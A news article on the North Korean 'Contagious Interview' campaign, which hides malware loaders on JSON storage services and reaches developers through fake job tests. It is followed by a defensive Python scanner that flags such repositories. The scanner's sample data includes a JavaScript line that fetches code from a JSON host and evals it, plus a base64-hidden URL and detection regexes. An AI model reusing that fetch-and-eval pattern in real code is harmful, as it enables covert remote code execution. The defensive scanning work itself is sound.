LONDON (IT BOLTWISE) – North Korean hackers have developed a new method to use JSON storage services as covert channels for malware attacks. This tactic is part of the so-called ‘Contagious Interview’ campaign, which targets developers and organizations worldwide.


In the world of cyber espionage, North Korean hackers have once again demonstrated their sophistication by turning harmless JSON storage services into covert channels for malware distribution. This strategy is part of the ongoing ‘Contagious Interview’ campaign, which shows how state-sponsored threats targeting developers and organizations worldwide continue to evolve.

North Korea-linked threat actors reportedly use platforms such as JSON Keeper, JSONsilo, and npoint.io. These services, typically used to store and share JSON data, are now being repurposed to host malicious payloads in Trojanized code repositories. The campaign, attributed to the North Korean group Sapphire Sleet, or BlueNoroff, builds on previous methods that used fake job interviews.

Hackers pose as recruiters on platforms like LinkedIn, luring victims with tempting job offers that lead to downloads of infected software disguised as code tests or interview tools. Newer iterations integrate JSON services to evade detection. Attackers use these platforms to store obfuscated JavaScript code that fetches additional stages of malware, including the BeaverTail backdoor and the TsunamiKit loader.

The attack begins with spear-phishing emails or messages that direct targets to GitHub repositories containing seemingly legitimate projects. Hidden within these repos are scripts that retrieve data from JSON services and then execute malicious commands on the victim’s machine. Security experts at Palo Alto Networks’ Unit 42 have observed similar patterns in which North Korean actors chain multiple payloads. This layered approach complicates detection and enables persistence through data exfiltration tools like InvisibleFerret.
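For defenders reviewing a repository received as a "code test", the pattern described above can be triaged before anything is run. The following is an added example, not code from the article or from any vendor: the hostnames `jsonkeeper.com` and `jsonsilo.com` are assumed for the services named, and the base64 check is an assumption about how a URL might be hidden in a config value.

```python
import base64
import re

# Hostnames assumed for the services the article names (JSON Keeper, JSONsilo, npoint.io).
JSON_HOSTS = ("jsonkeeper.com", "jsonsilo.com", "npoint.io")
# JavaScript constructs that turn fetched text into running code.
EXEC_SINKS = re.compile(r"\beval\s*\(|new\s+Function\s*\(|\bvm\.run\w*\s*\(|child_process")
# Long base64-looking strings, e.g. a URL disguised as an "API key" (assumption).
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")

def find_hosts(text):
    """Return JSON-storage hosts referenced in plain form or inside base64 strings."""
    hits = {h for h in JSON_HOSTS if h in text.lower()}
    for token in B64_TOKEN.findall(text):
        padded = token + "=" * (-len(token) % 4)
        try:
            decoded = base64.b64decode(padded).decode("utf-8", "ignore").lower()
        except ValueError:  # not valid base64 after all
            continue
        hits.update(h for h in JSON_HOSTS if h in decoded)
    return sorted(hits)

def triage(files):
    """Map path -> finding; 'high' when a JSON host and an execution sink share a file."""
    findings = {}
    for path, text in files.items():
        hosts = find_hosts(text)
        if hosts:
            severity = "high" if EXEC_SINKS.search(text) else "review"
            findings[path] = {"hosts": hosts, "severity": severity}
    return findings

# Constructed sample repository contents (not taken from any real project).
_ENC = base64.b64encode(b"https://api.npoint.io/EXAMPLE-ID").decode()
SAMPLE = {
    "server/config.js": f'module.exports = {{ API_KEY: "{_ENC}" }};',
    "server/loader.js": 'fetch("https://jsonkeeper.com/b/EXAMPLE").then(r => r.json()).then(j => eval(j.code));',
    "docs/readme.md": "Demo fixtures are hosted at https://www.jsonsilo.com/ for convenience.",
    "src/index.js": 'console.log("hello");',
}

if __name__ == "__main__":
    for path, finding in triage(SAMPLE).items():
        print(path, finding)
```

A "review" result is not proof of compromise, since these services have legitimate uses; it marks files to read by hand before installing dependencies or running the project.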

